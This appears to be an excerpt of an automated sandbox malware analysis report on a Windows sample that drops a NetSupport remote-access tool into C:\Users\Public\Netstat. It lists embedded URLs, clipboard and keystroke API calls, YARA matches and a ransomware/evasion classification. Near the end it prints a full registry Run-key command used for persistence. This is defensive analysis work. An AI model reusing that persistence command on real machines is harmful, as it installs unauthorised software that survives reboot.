                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: bild.exe, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp2.
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp7
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp;
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspG
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspLMEMH
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspM
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspU
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspc
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspi
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspt
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://sv.symcd.com0&
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://www.pci.co.uk/support
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://www.symauth.com/cps0(
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://www.symauth.com/rpa00
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: https://d.symcb.com/cps0%
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11032EE0 GetClipboardFormatNameA,SetClipboardData
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11032EE0 GetClipboardFormatNameA,SetClipboardData
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                Source: Yara match | File source: 10.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.5322800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 11.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 6.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 10.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 6.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 11.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 7436, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: bild.exe PID: 7692, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: bild.exe PID: 7904, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: bild.exe PID: 8120, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: bild.exe PID: 7176, type: MEMORYSTR
                                Source: Yara match | File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
                                Source: C:\Users\Public\Netstat\bild.exe | Process Stats: CPU usage > 49%
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D77070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D85984
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D78409
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D9E8D4
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D830E6
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D7E045
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D7D1D2
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8E94A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8FAC8
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8F25E
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D7BA1A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D73203
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D863F2
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D7DBE2
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D9A35E
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D92B78
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D82B3A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D7EC97
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D7D5E4
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D85DB9
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D82DB5
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D75E96
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8F693
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D99EB0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8EE46
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D73FC5
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D84FB5
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D7276C
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110733B0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11029590
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11061C90
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11033010
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11163220
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11167485
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110454F0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1101B760
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_111258B0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1101BBA0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11087C60
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11080480
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1115E980
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1101C9C0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110088AB
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11050D80
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5DA980
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C603DB8
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C603923
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C604910
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5DDBA0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5E84F0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C604528
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5D1760
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C60A063
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C604156
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5D1310
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11061C90
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11033010
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110733B0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11163220
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11029590
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11167485
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110454F0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1101B760
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_111258B0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1101BBA0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11087C60
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11080480
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1115E980
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1101C9C0
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110088AB
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11050D80
                                Source: C:\Users\Public\Netstat\bild.exe | Process token adjusted: Security
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: String function: 00D8CEC0 appears 52 times
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: String function: 00D8D870 appears 31 times
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: String function: 00D8CDF0 appears 37 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 110B7A20 appears 43 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 11146450 appears 1191 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 1109D8C0 appears 32 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 6C5E7C70 appears 36 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 11146EC0 appears 48 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 110278E0 appears 94 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 6C5F9480 appears 57 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 1116F010 appears 74 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 11029450 appears 1989 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 6C5E7A90 appears 58 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 6C5FF3CB appears 33 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 111603E3 appears 82 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 11173663 appears 40 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 1105DD10 appears 581 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 6C5D30A0 appears 54 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 6C5E7D00 appears 127 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 11081BB0 appears 81 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 1105DE40 appears 54 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 6C5D6F50 appears 168 times
                                Source: C:\Users\Public\Netstat\bild.exe | Code function: String function: 11164010 appears 64 times
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000548C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepcicl32.dll2 vs d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametcctl32.dll2 vs d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Source: classification engine | Classification label: mal96.rans.evad.winEXE@14/12@1/2
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11059C50 GetLastError,FormatMessageA,LocalFree
